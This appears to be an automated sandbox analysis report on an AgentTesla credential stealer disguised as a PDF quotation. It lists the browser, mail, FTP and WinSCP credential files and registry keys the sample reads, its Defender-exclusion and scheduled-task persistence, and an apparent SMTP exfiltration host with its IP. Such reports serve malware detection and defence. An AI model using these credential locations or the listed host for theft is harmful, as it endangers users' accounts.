                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UN-Quotation 70000000187366444_PDF.exe.375a480.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000000.292589787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000000.294076711.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.300201065.000000000375A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.510843577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000000.293458897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: UN-Quotation 70000000187366444_PDF.exe PID: 6220, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: UN-Quotation 70000000187366444_PDF.exe PID: 6936, type: MEMORYSTR
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: Yara matchFile source: 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: UN-Quotation 70000000187366444_PDF.exe PID: 6936, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UN-Quotation 70000000187366444_PDF.exe.375a480.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000000.292589787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000000.294076711.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.300201065.000000000375A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.510843577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000000.293458897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: UN-Quotation 70000000187366444_PDF.exe PID: 6220, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: UN-Quotation 70000000187366444_PDF.exe PID: 6936, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts211
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		11
                    Process Injection                    		1
                    Masquerading                    		2
                    OS Credential Dumping                    		311
                    Security Software Discovery                    		Remote Services1
                    Email Collection                    		Exfiltration Over Other Network Medium1
                    Encrypted Channel                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Scheduled Task/Job                    		Boot or Logon Initialization Scripts1
                    Scheduled Task/Job                    		11
                    Disable or Modify Tools                    		1
                    Credentials in Registry                    		1
                    Process Discovery                    		Remote Desktop Protocol11
                    Archive Collected Data                    		Exfiltration Over Bluetooth1
                    Non-Standard Port                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)131
                    Virtualization/Sandbox Evasion                    		Security Account Manager131
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin Shares2
                    Data from Local System                    		Automated Exfiltration1
                    Non-Application Layer Protocol                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput CaptureScheduled Transfer11
                    Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    Remote System Discovery                    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common2
                    Obfuscated Files or Information                    		Cached Domain Credentials1
                    File and Directory Discovery                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items13
                    Software Packing                    		DCSync114
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 652379 Sample: UN-Quotation 70000000187366... Startdate: 26/06/2022 Architecture: WINDOWS Score: 100 37 Snort IDS alert for network traffic 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for dropped file 2->41 43 13 other signatures 2->43 7 UN-Quotation 70000000187366444_PDF.exe 7 2->7         started        process3 file4 27 C:\Users\user\AppData\Roaming\XrgnLg.exe, PE32 7->27 dropped 29 C:\Users\user\...\XrgnLg.exe:Zone.Identifier, ASCII 7->29 dropped 31 C:\Users\user\AppData\Local\...\tmp25F3.tmp, XML 7->31 dropped 33 UN-Quotation 70000...7366444_PDF.exe.log, ASCII 7->33 dropped 45 Adds a directory exclusion to Windows Defender 7->45 11 UN-Quotation 70000000187366444_PDF.exe 2 7->11         started        15 powershell.exe 24 7->15         started        17 powershell.exe 25 7->17         started        19 schtasks.exe 1 7->19         started        signatures5 process6 dnsIp7 35 mail.bonsa.lt 193.46.84.142, 49741, 587 BST-LT Lithuania 11->35 47 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->47 49 Tries to steal Mail credentials (via file / registry access) 11->49 51 Tries to harvest and steal ftp login credentials 11->51 53 Tries to harvest and steal browser information (history, passwords, etc) 11->53 21 conhost.exe 15->21         started        23 conhost.exe 17->23         started        25 conhost.exe 19->25         started        signatures8 process9

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    UN-Quotation 70000000187366444_PDF.exe38%VirustotalBrowse
                    UN-Quotation 70000000187366444_PDF.exe20%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    UN-Quotation 70000000187366444_PDF.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\XrgnLg.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\XrgnLg.exe20%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                    10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                    10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                    10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    10.0.UN-Quotation 70000000187366444_PDF.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                    10.0.UN-Quotation 70000000187366444_PDF.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File

                    Domains

                    SourceDetectionScannerLabelLink
                    mail.bonsa.lt0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://www.carterandcone.comn-u0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.zhongyicts.com.cnn-u0%URL Reputationsafe
                    http://fontfabrik.comH:0%Avira URL Cloudsafe
                    http://www.tiro.com0%URL Reputationsafe
                    https://api.ipify.org%%startupfolder%0%URL Reputationsafe
                    http://www.carterandcone.comue4B0%Avira URL Cloudsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.carterandcone.com0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.net8bX0%Avira URL Cloudsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://www.carterandcone.com:0%Avira URL Cloudsafe
                    http://www.sandoll.co.krcom0%URL Reputationsafe
                    http://www.carterandcone.com.HB0%Avira URL Cloudsafe
                    http://www.sajatypeworks.comY0%Avira URL Cloudsafe
                    http://www.fontbureau.commsd0%Avira URL Cloudsafe
                    http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                    http://www.carterandcone.como.HB0%Avira URL Cloudsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.carterandcone.comQ0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.carterandcone.como.0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.zhongyicts.com.cnue4B0%Avira URL Cloudsafe
                    https://api.ipify.org%0%URL Reputationsafe
                    http://www.carterandcone.coma0%URL Reputationsafe
                    http://www.fontbureau.comcomd0%URL Reputationsafe
                    https://oVr11J0CkkX1DVO37.net0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn8OX0%Avira URL Cloudsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                    http://www.carterandcone.comv0%URL Reputationsafe
                    http://mail.bonsa.lt0%Avira URL Cloudsafe
                    http://en.w0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://lAnHfH.com0%Avira URL Cloudsafe
                    http://www.fontbureau.comcomF0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.founder.com.cn/cn/jBu0%Avira URL Cloudsafe
                    http://www.sandoll.co.krim0%URL Reputationsafe
                    http://www.tiro.comNorm0%Avira URL Cloudsafe
                    http://www.fontbureau.comals0%URL Reputationsafe
                    http://www.fontbureau.comalic0%URL Reputationsafe
                    http://www.goodfont.co.krfk60%Avira URL Cloudsafe
                    http://www.typography.netiv0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn#0%URL Reputationsafe
                    http://www.carterandcone.comn-uFi0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mail.bonsa.lt
                    		193.46.84.142
                    		truetrueunknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://127.0.0.1:HTTP/1.1UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://www.fontbureau.com/designersGUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.carterandcone.comn-uUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers/?UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bTheUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.zhongyicts.com.cnn-uUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252502935.000000000558A000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers?UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://fontfabrik.comH:UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248610040.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.tiro.comUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251850802.0000000005582000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251729621.0000000005587000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251932047.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260487275.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257449014.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://api.ipify.org%%startupfolder%UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		low
                            http://www.carterandcone.comue4BUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252961183.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252905326.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.goodfont.co.krUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.carterandcone.comUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252803533.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252757829.0000000005582000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252905326.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.sajatypeworks.comUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.247789916.000000000559B000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.typography.net8bXUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248734873.0000000005584000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.typography.netDUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cn/cTheUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/staff/dennis.htmUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.263325743.000000000558C000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://fontfabrik.comUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248676313.0000000005584000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248638895.0000000005584000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248610040.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.carterandcone.com:UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.sandoll.co.krcomUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.carterandcone.com.HBUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253010678.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.sajatypeworks.comYUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.247789916.000000000559B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.fontbureau.commsdUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.295386008.0000000005580000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303672867.0000000005580000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://DynDns.comDynDNSnamejidpasswordPsi/PsiUN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
